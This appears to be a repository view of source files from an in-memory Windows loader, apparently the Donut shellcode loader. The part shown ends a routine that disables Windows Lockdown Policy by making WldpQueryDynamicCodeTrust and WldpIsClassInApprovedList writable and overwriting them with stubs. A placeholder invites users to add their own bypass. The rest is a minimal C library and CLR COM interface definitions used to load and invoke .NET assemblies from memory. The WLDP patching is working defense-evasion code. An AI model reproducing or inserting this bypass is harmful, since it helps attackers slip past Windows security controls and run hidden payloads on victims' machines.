318 cs = inst->api.GetProcAddress(wldp, inst->wldpQuery);
319 if(cs == NULL) return FALSE;
320
321 // calculate length of stub
322 len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
323 (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
324
325 DPRINT("Length of WldpQueryDynamicCodeTrustStub is %" PRIi32 " bytes.", len);
326
327 // check for negative length. this would only happen when
328 // compiler decides to re-order functions.
329 if((int)len < 0) return FALSE;
330
331 // make the memory writeable. return FALSE on error
332 if(!inst->api.VirtualProtect(
333 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
334
335 // overwrite with virtual address of stub
336 Memcpy(cs, ADR(PCHAR, WldpQueryDynamicCodeTrustStub), len);
337 // set back to original protection
338 inst->api.VirtualProtect(cs, len, op, &t);
339
340 // resolve address of WldpIsClassInApprovedList
341 // if not found, return FALSE because it should exist
342 cs = inst->api.GetProcAddress(wldp, inst->wldpIsApproved);
343 if(cs == NULL) return FALSE;
344
345 // calculate length of stub
346 len = (ULONG_PTR)WldpIsClassInApprovedListStubEnd -
347 (ULONG_PTR)WldpIsClassInApprovedListStub;
348
349 DPRINT("Length of WldpIsClassInApprovedListStub is %" PRIi32 " bytes.", len);
350
351 // check for negative length. this would only happen when
352 // compiler decides to re-order functions.
353 if((int)len < 0) return FALSE;
354
355 // make the memory writeable. return FALSE on error
356 if(!inst->api.VirtualProtect(
357 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
358
359 // overwrite with virtual address of stub
360 Memcpy(cs, ADR(PCHAR, WldpIsClassInApprovedListStub), len);
361 // set back to original protection
362 inst->api.VirtualProtect(cs, len, op, &t);
363
364 return TRUE;
365 }
366 #elif defined(BYPASS_WLDP_B)
367 // This is where you may define your own WLDP bypass.
368 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_WLDP_B defined.
369
370 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
371
372 }
373 #endif
+100
-0
loader/clib.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <inttypes.h>
32 #include <stddef.h>
33
34 // functions to replace intrinsic C library functions
35
36 // funnily enough, MSVC still tries to replace this
37 // with memset hence the use of assembly..
38 void *Memset (void *ptr, int value, uint32_t num) {
39
40 #ifdef _MSC_VER
41 __stosb(ptr, value, num);
42 #else
43 unsigned char *p = (unsigned char*)ptr;
44
45 while(num--) {
46 *p = (unsigned char)value;
47 p++;
48 }
49 #endif
50 return ptr;
51 }
52
53 void *Memcpy (void *destination, const void *source, uint32_t num) {
54 unsigned char *out = (unsigned char*)destination;
55 unsigned char *in = (unsigned char*)source;
56
57 while(num--) {
58 *out = *in;
59 out++; in++;
60 }
61 return destination;
62 }
63
64 int Memcmp(const void *ptr1, const void *ptr2, uint32_t num) {
65 register const unsigned char *s1 = (const unsigned char*)ptr1;
66 register const unsigned char *s2 = (const unsigned char*)ptr2;
67
68 while (num-- > 0) {
69 if (*s1++ != *s2++)
70 return s1[-1] < s2[-1] ? -1 : 1;
71 }
72 return 0;
73 }
74
75 int compare(const char *s1, const char *s2) {
76 while(*s1 && *s2) {
77 if(*s1 != *s2) {
78 return 0;
79 }
80 s1++; s2++;
81 }
82 return *s2 == 0;
83 }
84
85 const char* _strstr(const char *s1, const char *s2) {
86 while (*s1) {
87 if((*s1 == *s2) && compare(s1, s2)) return s1;
88 s1++;
89 }
90 return NULL;
91 }
92
93 int _strcmp(const char *str1, const char *str2) {
94 while (*str1 && *str2) {
95 if(*str1 != *str2) break;
96 str1++; str2++;
97 }
98 return (int)*str1 - (int)*str2;
99 }
+916
-0
loader/clr.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef CLR_H
32 #define CLR_H
33
34 typedef struct _ICLRMetaHost ICLRMetaHost;
35 typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo;
36 typedef struct _ICorRuntimeHost ICorRuntimeHost;
37 typedef struct _ICorConfiguration ICorConfiguration;
38 typedef struct _IGCThreadControl IGCThreadControl;
39 typedef struct _IGCHostControl IGCHostControl;
40 typedef struct _IDebuggerThreadControl IDebuggerThreadControl;
41 typedef struct _AppDomain IAppDomain;
42 typedef struct _Assembly IAssembly;
43 typedef struct _Type IType;
44 typedef struct _Binder IBinder;
45 typedef struct _MethodInfo IMethodInfo;
46
47 typedef void *HDOMAINENUM;
48
49 typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )(
50 REFCLSID clsid,
51 REFIID riid,
52 LPVOID *ppInterface);
53
54 typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )(
55 REFCLSID clsid,
56 REFIID riid,
57 LPVOID *ppInterface);
58
59
60 typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void);
61
62 typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void);
63
64 typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )(
65 ICLRRuntimeInfo *pRuntimeInfo,
66 CallbackThreadSetFnPtr pfnCallbackThreadSet,
67 CallbackThreadUnsetFnPtr pfnCallbackThreadUnset);
68
69 #undef DUMMY_METHOD
70 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
71
72 typedef struct _BinderVtbl {
73 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
74 IBinder * This,
75 /* [in] */ REFIID riid,
76 /* [iid_is][out] */ void **ppvObject);
77
78 ULONG ( STDMETHODCALLTYPE *AddRef )(
79 IBinder * This);
80
81 ULONG ( STDMETHODCALLTYPE *Release )(
82 IBinder * This);
83
84 DUMMY_METHOD(GetTypeInfoCount);
85 DUMMY_METHOD(GetTypeInfo);
86 DUMMY_METHOD(GetIDsOfNames);
87 DUMMY_METHOD(Invoke);
88 DUMMY_METHOD(ToString);
89 DUMMY_METHOD(Equals);
90 DUMMY_METHOD(GetHashCode);
91 DUMMY_METHOD(GetType);
92 DUMMY_METHOD(BindToMethod);
93 DUMMY_METHOD(BindToField);
94 DUMMY_METHOD(SelectMethod);
95 DUMMY_METHOD(SelectProperty);
96 DUMMY_METHOD(ChangeType);
97 DUMMY_METHOD(ReorderArgumentArray);
98 } BinderVtbl;
99
100 typedef struct _Binder {
101 BinderVtbl *lpVtbl;
102 } Binder;
103
104 #undef DUMMY_METHOD
105 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This)
106
107 typedef struct _AppDomainVtbl {
108 BEGIN_INTERFACE
109
110 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
111 IAppDomain * This,
112 /* [in] */ REFIID riid,
113 /* [iid_is][out] */ void **ppvObject);
114
115 ULONG ( STDMETHODCALLTYPE *AddRef )(
116 IAppDomain * This);
117
118 ULONG ( STDMETHODCALLTYPE *Release )(
119 IAppDomain * This);
120
121 DUMMY_METHOD(GetTypeInfoCount);
122 DUMMY_METHOD(GetTypeInfo);
123 DUMMY_METHOD(GetIDsOfNames);
124 DUMMY_METHOD(Invoke);
125
126 DUMMY_METHOD(ToString);
127 DUMMY_METHOD(Equals);
128 DUMMY_METHOD(GetHashCode);
129 DUMMY_METHOD(GetType);
130 DUMMY_METHOD(InitializeLifetimeService);
131 DUMMY_METHOD(GetLifetimeService);
132 DUMMY_METHOD(Evidence);
133 DUMMY_METHOD(add_DomainUnload);
134 DUMMY_METHOD(remove_DomainUnload);
135 DUMMY_METHOD(add_AssemblyLoad);
136 DUMMY_METHOD(remove_AssemblyLoad);
137 DUMMY_METHOD(add_ProcessExit);
138 DUMMY_METHOD(remove_ProcessExit);
139 DUMMY_METHOD(add_TypeResolve);
140 DUMMY_METHOD(remove_TypeResolve);
141 DUMMY_METHOD(add_ResourceResolve);
142 DUMMY_METHOD(remove_ResourceResolve);
143 DUMMY_METHOD(add_AssemblyResolve);
144 DUMMY_METHOD(remove_AssemblyResolve);
145 DUMMY_METHOD(add_UnhandledException);
146 DUMMY_METHOD(remove_UnhandledException);
147 DUMMY_METHOD(DefineDynamicAssembly);
148 DUMMY_METHOD(DefineDynamicAssembly_2);
149 DUMMY_METHOD(DefineDynamicAssembly_3);
150 DUMMY_METHOD(DefineDynamicAssembly_4);
151 DUMMY_METHOD(DefineDynamicAssembly_5);
152 DUMMY_METHOD(DefineDynamicAssembly_6);
153 DUMMY_METHOD(DefineDynamicAssembly_7);
154 DUMMY_METHOD(DefineDynamicAssembly_8);
155 DUMMY_METHOD(DefineDynamicAssembly_9);
156 DUMMY_METHOD(CreateInstance);
157 DUMMY_METHOD(CreateInstanceFrom);
158 DUMMY_METHOD(CreateInstance_2);
159 DUMMY_METHOD(CreateInstanceFrom_2);
160 DUMMY_METHOD(CreateInstance_3);
161 DUMMY_METHOD(CreateInstanceFrom_3);
162 DUMMY_METHOD(Load);
163 DUMMY_METHOD(Load_2);
164
165 HRESULT (STDMETHODCALLTYPE *Load_3)(
166 IAppDomain *This,
167 SAFEARRAY *rawAssembly,
168 IAssembly **pRetVal);
169
170 DUMMY_METHOD(Load_4);
171 DUMMY_METHOD(Load_5);
172 DUMMY_METHOD(Load_6);
173 DUMMY_METHOD(Load_7);
174 DUMMY_METHOD(ExecuteAssembly);
175 DUMMY_METHOD(ExecuteAssembly_2);
176 DUMMY_METHOD(ExecuteAssembly_3);
177 DUMMY_METHOD(FriendlyName);
178 DUMMY_METHOD(BaseDirectory);
179 DUMMY_METHOD(RelativeSearchPath);
180 DUMMY_METHOD(ShadowCopyFiles);
181 DUMMY_METHOD(GetAssemblies);
182 DUMMY_METHOD(AppendPrivatePath);
183 DUMMY_METHOD(ClearPrivatePath);
184 DUMMY_METHOD(SetShadowCopyPath);
185 DUMMY_METHOD(ClearShadowCopyPath);
186 DUMMY_METHOD(SetCachePath);
187 DUMMY_METHOD(SetData);
188 DUMMY_METHOD(GetData);
189 DUMMY_METHOD(SetAppDomainPolicy);
190 DUMMY_METHOD(SetThreadPrincipal);
191 DUMMY_METHOD(SetPrincipalPolicy);
192 DUMMY_METHOD(DoCallBack);
193 DUMMY_METHOD(DynamicDirectory);
194
195 END_INTERFACE
196 } AppDomainVtbl;
197
198 typedef struct _AppDomain {
199 AppDomainVtbl *lpVtbl;
200 } AppDomain;
201
202 #undef DUMMY_METHOD
203 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This)
204
205 typedef struct _AssemblyVtbl {
206 BEGIN_INTERFACE
207
208 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
209 IAssembly * This,
210 REFIID riid,
211 void **ppvObject);
212
213 ULONG ( STDMETHODCALLTYPE *AddRef )(
214 IAssembly * This);
215
216 ULONG ( STDMETHODCALLTYPE *Release )(
217 IAssembly * This);
218
219 DUMMY_METHOD(GetTypeInfoCount);
220 DUMMY_METHOD(GetTypeInfo);
221 DUMMY_METHOD(GetIDsOfNames);
222
223 DUMMY_METHOD(Invoke);
224 DUMMY_METHOD(ToString);
225 DUMMY_METHOD(Equals);
226 DUMMY_METHOD(GetHashCode);
227 DUMMY_METHOD(GetType);
228 DUMMY_METHOD(CodeBase);
229 DUMMY_METHOD(EscapedCodeBase);
230 DUMMY_METHOD(GetName);
231 DUMMY_METHOD(GetName_2);
232 DUMMY_METHOD(FullName);
233
234 HRESULT (STDMETHODCALLTYPE *EntryPoint)(
235 IAssembly *This,
236 IMethodInfo **pRetVal);
237
238 HRESULT (STDMETHODCALLTYPE *GetType_2)(
239 IAssembly *This,
240 BSTR name,
241 IType **pRetVal);
242
243 DUMMY_METHOD(GetType_3);
244 DUMMY_METHOD(GetExportedTypes);
245 DUMMY_METHOD(GetTypes);
246 DUMMY_METHOD(GetManifestResourceStream);
247 DUMMY_METHOD(GetManifestResourceStream_2);
248 DUMMY_METHOD(GetFile);
249 DUMMY_METHOD(GetFiles);
250 DUMMY_METHOD(GetFiles_2);
251 DUMMY_METHOD(GetManifestResourceNames);
252 DUMMY_METHOD(GetManifestResourceInfo);
253 DUMMY_METHOD(Location);
254 DUMMY_METHOD(Evidence);
255 DUMMY_METHOD(GetCustomAttributes);
256 DUMMY_METHOD(GetCustomAttributes_2);
257 DUMMY_METHOD(IsDefined);
258 DUMMY_METHOD(GetObjectData);
259 DUMMY_METHOD(add_ModuleResolve);
260 DUMMY_METHOD(remove_ModuleResolve);
261 DUMMY_METHOD(GetType_4);
262 DUMMY_METHOD(GetSatelliteAssembly);
263 DUMMY_METHOD(GetSatelliteAssembly_2);
264 DUMMY_METHOD(LoadModule);
265 DUMMY_METHOD(LoadModule_2);
266 DUMMY_METHOD(CreateInstance);
267 DUMMY_METHOD(CreateInstance_2);
268 DUMMY_METHOD(CreateInstance_3);
269 DUMMY_METHOD(GetLoadedModules);
270 DUMMY_METHOD(GetLoadedModules_2);
271 DUMMY_METHOD(GetModules);
272 DUMMY_METHOD(GetModules_2);
273 DUMMY_METHOD(GetModule);
274 DUMMY_METHOD(GetReferencedAssemblies);
275 DUMMY_METHOD(GlobalAssemblyCache);
276
277 END_INTERFACE
278 } AssemblyVtbl;
279
280 typedef enum _BindingFlags {
281 BindingFlags_Default = 0,
282 BindingFlags_IgnoreCase = 1,
283 BindingFlags_DeclaredOnly = 2,
284 BindingFlags_Instance = 4,
285 BindingFlags_Static = 8,
286 BindingFlags_Public = 16,
287 BindingFlags_NonPublic = 32,
288 BindingFlags_FlattenHierarchy = 64,
289 BindingFlags_InvokeMethod = 256,
290 BindingFlags_CreateInstance = 512,
291 BindingFlags_GetField = 1024,
292 BindingFlags_SetField = 2048,
293 BindingFlags_GetProperty = 4096,
294 BindingFlags_SetProperty = 8192,
295 BindingFlags_PutDispProperty = 16384,
296 BindingFlags_PutRefDispProperty = 32768,
297 BindingFlags_ExactBinding = 65536,
298 BindingFlags_SuppressChangeType = 131072,
299 BindingFlags_OptionalParamBinding = 262144,
300 BindingFlags_IgnoreReturn = 16777216
301 } BindingFlags;
302
303 typedef struct _Assembly {
304 AssemblyVtbl *lpVtbl;
305 } Assembly;
306
307 #undef DUMMY_METHOD
308 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This)
309
310 typedef struct _TypeVtbl {
311 BEGIN_INTERFACE
312
313 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
314 IType * This,
315 REFIID riid,
316 void **ppvObject);
317
318 ULONG ( STDMETHODCALLTYPE *AddRef )(
319 IType * This);
320
321 ULONG ( STDMETHODCALLTYPE *Release )(
322 IType * This);
323
324 DUMMY_METHOD(GetTypeInfoCount);
325 DUMMY_METHOD(GetTypeInfo);
326 DUMMY_METHOD(GetIDsOfNames);
327 DUMMY_METHOD(Invoke);
328
329 DUMMY_METHOD(ToString);
330 DUMMY_METHOD(Equals);
331 DUMMY_METHOD(GetHashCode);
332 DUMMY_METHOD(GetType);
333 DUMMY_METHOD(MemberType);
334 DUMMY_METHOD(name);
335 DUMMY_METHOD(DeclaringType);
336 DUMMY_METHOD(ReflectedType);
337 DUMMY_METHOD(GetCustomAttributes);
338 DUMMY_METHOD(GetCustomAttributes_2);
339 DUMMY_METHOD(IsDefined);
340 DUMMY_METHOD(Guid);
341 DUMMY_METHOD(Module);
342 DUMMY_METHOD(Assembly);
343 DUMMY_METHOD(TypeHandle);
344 DUMMY_METHOD(FullName);
345 DUMMY_METHOD(Namespace);
346 DUMMY_METHOD(AssemblyQualifiedName);
347 DUMMY_METHOD(GetArrayRank);
348 DUMMY_METHOD(BaseType);
349 DUMMY_METHOD(GetConstructors);
350 DUMMY_METHOD(GetInterface);
351 DUMMY_METHOD(GetInterfaces);
352 DUMMY_METHOD(FindInterfaces);
353 DUMMY_METHOD(GetEvent);
354 DUMMY_METHOD(GetEvents);
355 DUMMY_METHOD(GetEvents_2);
356 DUMMY_METHOD(GetNestedTypes);
357 DUMMY_METHOD(GetNestedType);
358 DUMMY_METHOD(GetMember);
359 DUMMY_METHOD(GetDefaultMembers);
360 DUMMY_METHOD(FindMembers);
361 DUMMY_METHOD(GetElementType);
362 DUMMY_METHOD(IsSubclassOf);
363 DUMMY_METHOD(IsInstanceOfType);
364 DUMMY_METHOD(IsAssignableFrom);
365 DUMMY_METHOD(GetInterfaceMap);
366 DUMMY_METHOD(GetMethod);
367 DUMMY_METHOD(GetMethod_2);
368 DUMMY_METHOD(GetMethods);
369 DUMMY_METHOD(GetField);
370 DUMMY_METHOD(GetFields);
371 DUMMY_METHOD(GetProperty);
372 DUMMY_METHOD(GetProperty_2);
373 DUMMY_METHOD(GetProperties);
374 DUMMY_METHOD(GetMember_2);
375 DUMMY_METHOD(GetMembers);
376 DUMMY_METHOD(InvokeMember);
377 DUMMY_METHOD(UnderlyingSystemType);
378 DUMMY_METHOD(InvokeMember_2);
379
380 HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
381 IType *This,
382 BSTR name,
383 BindingFlags invokeAttr,
384 IBinder *Binder,
385 VARIANT Target,
386 SAFEARRAY *args,
387 VARIANT *pRetVal);
388
389 DUMMY_METHOD(GetConstructor);
390 DUMMY_METHOD(GetConstructor_2);
391 DUMMY_METHOD(GetConstructor_3);
392 DUMMY_METHOD(GetConstructors_2);
393 DUMMY_METHOD(TypeInitializer);
394 DUMMY_METHOD(GetMethod_3);
395 DUMMY_METHOD(GetMethod_4);
396 DUMMY_METHOD(GetMethod_5);
397 DUMMY_METHOD(GetMethod_6);
398 DUMMY_METHOD(GetMethods_2);
399 DUMMY_METHOD(GetField_2);
400 DUMMY_METHOD(GetFields_2);
401 DUMMY_METHOD(GetInterface_2);
402 DUMMY_METHOD(GetEvent_2);
403 DUMMY_METHOD(GetProperty_3);
404 DUMMY_METHOD(GetProperty_4);
405 DUMMY_METHOD(GetProperty_5);
406 DUMMY_METHOD(GetProperty_6);
407 DUMMY_METHOD(GetProperty_7);
408 DUMMY_METHOD(GetProperties_2);
409 DUMMY_METHOD(GetNestedTypes_2);
410 DUMMY_METHOD(GetNestedType_2);
411 DUMMY_METHOD(GetMember_3);
412 DUMMY_METHOD(GetMembers_2);
413 DUMMY_METHOD(Attributes);
414 DUMMY_METHOD(IsNotPublic);
415 DUMMY_METHOD(IsPublic);
416 DUMMY_METHOD(IsNestedPublic);
417 DUMMY_METHOD(IsNestedPrivate);
418 DUMMY_METHOD(IsNestedFamily);
419 DUMMY_METHOD(IsNestedAssembly);
420 DUMMY_METHOD(IsNestedFamANDAssem);
421 DUMMY_METHOD(IsNestedFamORAssem);
422 DUMMY_METHOD(IsAutoLayout);
423 DUMMY_METHOD(IsLayoutSequential);
424 DUMMY_METHOD(IsExplicitLayout);
425 DUMMY_METHOD(IsClass);
426 DUMMY_METHOD(IsInterface);
427 DUMMY_METHOD(IsValueType);
428 DUMMY_METHOD(IsAbstract);
429 DUMMY_METHOD(IsSealed);
430 DUMMY_METHOD(IsEnum);
431 DUMMY_METHOD(IsSpecialName);
432 DUMMY_METHOD(IsImport);
433 DUMMY_METHOD(IsSerializable);
434 DUMMY_METHOD(IsAnsiClass);
435 DUMMY_METHOD(IsUnicodeClass);
436 DUMMY_METHOD(IsAutoClass);
437 DUMMY_METHOD(IsArray);
438 DUMMY_METHOD(IsByRef);
439 DUMMY_METHOD(IsPointer);
440 DUMMY_METHOD(IsPrimitive);
441 DUMMY_METHOD(IsCOMObject);
442 DUMMY_METHOD(HasElementType);
443 DUMMY_METHOD(IsContextful);
444 DUMMY_METHOD(IsMarshalByRef);
445 DUMMY_METHOD(Equals_2);
446
447 END_INTERFACE
448 } TypeVtbl;
449
450 typedef struct ICLRRuntimeInfoVtbl
451 {
452 BEGIN_INTERFACE
453
454 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
455 ICLRRuntimeInfo * This,
456 /* [in] */ REFIID riid,
457 /* [iid_is][out] */
458 __RPC__deref_out void **ppvObject);
459
460 ULONG ( STDMETHODCALLTYPE *AddRef )(
461 ICLRRuntimeInfo * This);
462
463 ULONG ( STDMETHODCALLTYPE *Release )(
464 ICLRRuntimeInfo * This);
465
466 HRESULT ( STDMETHODCALLTYPE *GetVersionString )(
467 ICLRRuntimeInfo * This,
468 /* [size_is][out] */
469 __out_ecount_full_opt(*pcchBuffer) LPWSTR pwzBuffer,
470 /* [out][in] */ DWORD *pcchBuffer);
471
472 HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )(
473 ICLRRuntimeInfo * This,
474 /* [size_is][out] */
475 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
476 /* [out][in] */ DWORD *pcchBuffer);
477
478 HRESULT ( STDMETHODCALLTYPE *IsLoaded )(
479 ICLRRuntimeInfo * This,
480 /* [in] */ HANDLE hndProcess,
481 /* [retval][out] */ BOOL *pbLoaded);
482
483 HRESULT ( STDMETHODCALLTYPE *LoadErrorString )(
484 ICLRRuntimeInfo * This,
485 /* [in] */ UINT iResourceID,
486 /* [size_is][out] */
487 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
488 /* [out][in] */ DWORD *pcchBuffer,
489 /* [lcid][in] */ LONG iLocaleID);
490
491 HRESULT ( STDMETHODCALLTYPE *LoadLibrary )(
492 ICLRRuntimeInfo * This,
493 /* [in] */ LPCWSTR pwzDllName,
494 /* [retval][out] */ HMODULE *phndModule);
495
496 HRESULT ( STDMETHODCALLTYPE *GetProcAddress )(
497 ICLRRuntimeInfo * This,
498 /* [in] */ LPCSTR pszProcName,
499 /* [retval][out] */ LPVOID *ppProc);
500
501 HRESULT ( STDMETHODCALLTYPE *GetInterface )(
502 ICLRRuntimeInfo * This,
503 /* [in] */ REFCLSID rclsid,
504 /* [in] */ REFIID riid,
505 /* [retval][iid_is][out] */ LPVOID *ppUnk);
506
507 HRESULT ( STDMETHODCALLTYPE *IsLoadable )(
508 ICLRRuntimeInfo * This,
509 /* [retval][out] */ BOOL *pbLoadable);
510
511 HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )(
512 ICLRRuntimeInfo * This,
513 /* [in] */ DWORD dwStartupFlags,
514 /* [in] */ LPCWSTR pwzHostConfigFile);
515
516 HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )(
517 ICLRRuntimeInfo * This,
518 /* [out] */ DWORD *pdwStartupFlags,
519 /* [size_is][out] */
520 __out_ecount_full_opt(*pcchHostConfigFile) LPWSTR pwzHostConfigFile,
521 /* [out][in] */ DWORD *pcchHostConfigFile);
522
523 HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )(
524 ICLRRuntimeInfo * This);
525
526 HRESULT ( STDMETHODCALLTYPE *IsStarted )(
527 ICLRRuntimeInfo * This,
528 /* [out] */ BOOL *pbStarted,
529 /* [out] */ DWORD *pdwStartupFlags);
530
531 END_INTERFACE
532 } ICLRRuntimeInfoVtbl;
533
534 typedef struct _ICLRRuntimeInfo {
535 ICLRRuntimeInfoVtbl *lpVtbl;
536 } ICLRRuntimeInfo;
537
538 typedef struct _Type {
539 TypeVtbl *lpVtbl;
540 } Type;
541
542 typedef struct ICLRMetaHostVtbl
543 {
544 BEGIN_INTERFACE
545
546 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
547 ICLRMetaHost * This,
548 /* [in] */ REFIID riid,
549 /* [iid_is][out] */
550 __RPC__deref_out void **ppvObject);
551
552 ULONG ( STDMETHODCALLTYPE *AddRef )(
553 ICLRMetaHost * This);
554
555 ULONG ( STDMETHODCALLTYPE *Release )(
556 ICLRMetaHost * This);
557
558 HRESULT ( STDMETHODCALLTYPE *GetRuntime )(
559 ICLRMetaHost * This,
560 /* [in] */ LPCWSTR pwzVersion,
561 /* [in] */ REFIID riid,
562 /* [retval][iid_is][out] */ LPVOID *ppRuntime);
563
564 HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )(
565 ICLRMetaHost * This,
566 /* [in] */ LPCWSTR pwzFilePath,
567 /* [size_is][out] */
568 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
569 /* [out][in] */ DWORD *pcchBuffer);
570
571 HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )(
572 ICLRMetaHost * This,
573 /* [retval][out] */ IEnumUnknown **ppEnumerator);
574
575 HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )(
576 ICLRMetaHost * This,
577 /* [in] */ HANDLE hndProcess,
578 /* [retval][out] */ IEnumUnknown **ppEnumerator);
579
580 HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )(
581 ICLRMetaHost * This,
582 /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction);
583
584 HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )(
585 ICLRMetaHost * This,
586 /* [in] */ REFIID riid,
587 /* [retval][iid_is][out] */ LPVOID *ppUnk);
588
589 HRESULT ( STDMETHODCALLTYPE *ExitProcess )(
590 ICLRMetaHost * This,
591 /* [in] */ INT32 iExitCode);
592
593 END_INTERFACE
594 } ICLRMetaHostVtbl;
595
596 typedef struct _ICLRMetaHost
597 {
598 ICLRMetaHostVtbl *lpVtbl;
599 } ICLRMetaHost;
600
601 typedef struct ICorRuntimeHostVtbl
602 {
603 BEGIN_INTERFACE
604
605 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
606 ICorRuntimeHost * This,
607 /* [in] */ REFIID riid,
608 /* [iid_is][out] */
609 __RPC__deref_out void **ppvObject);
610
611 ULONG ( STDMETHODCALLTYPE *AddRef )(
612 ICorRuntimeHost * This);
613
614 ULONG ( STDMETHODCALLTYPE *Release )(
615 ICorRuntimeHost * This);
616
617 HRESULT ( STDMETHODCALLTYPE *CreateLogicalThreadState )(
618 ICorRuntimeHost * This);
619
620 HRESULT ( STDMETHODCALLTYPE *DeleteLogicalThreadState )(
621 ICorRuntimeHost * This);
622
623 HRESULT ( STDMETHODCALLTYPE *SwitchInLogicalThreadState )(
624 ICorRuntimeHost * This,
625 /* [in] */ DWORD *pFiberCookie);
626
627 HRESULT ( STDMETHODCALLTYPE *SwitchOutLogicalThreadState )(
628 ICorRuntimeHost * This,
629 /* [out] */ DWORD **pFiberCookie);
630
631 HRESULT ( STDMETHODCALLTYPE *LocksHeldByLogicalThread )(
632 ICorRuntimeHost * This,
633 /* [out] */ DWORD *pCount);
634
635 HRESULT ( STDMETHODCALLTYPE *MapFile )(
636 ICorRuntimeHost * This,
637 /* [in] */ HANDLE hFile,
638 /* [out] */ HMODULE *hMapAddress);
639
640 HRESULT ( STDMETHODCALLTYPE *GetConfiguration )(
641 ICorRuntimeHost * This,
642 /* [out] */ ICorConfiguration **pConfiguration);
643
644 HRESULT ( STDMETHODCALLTYPE *Start )(
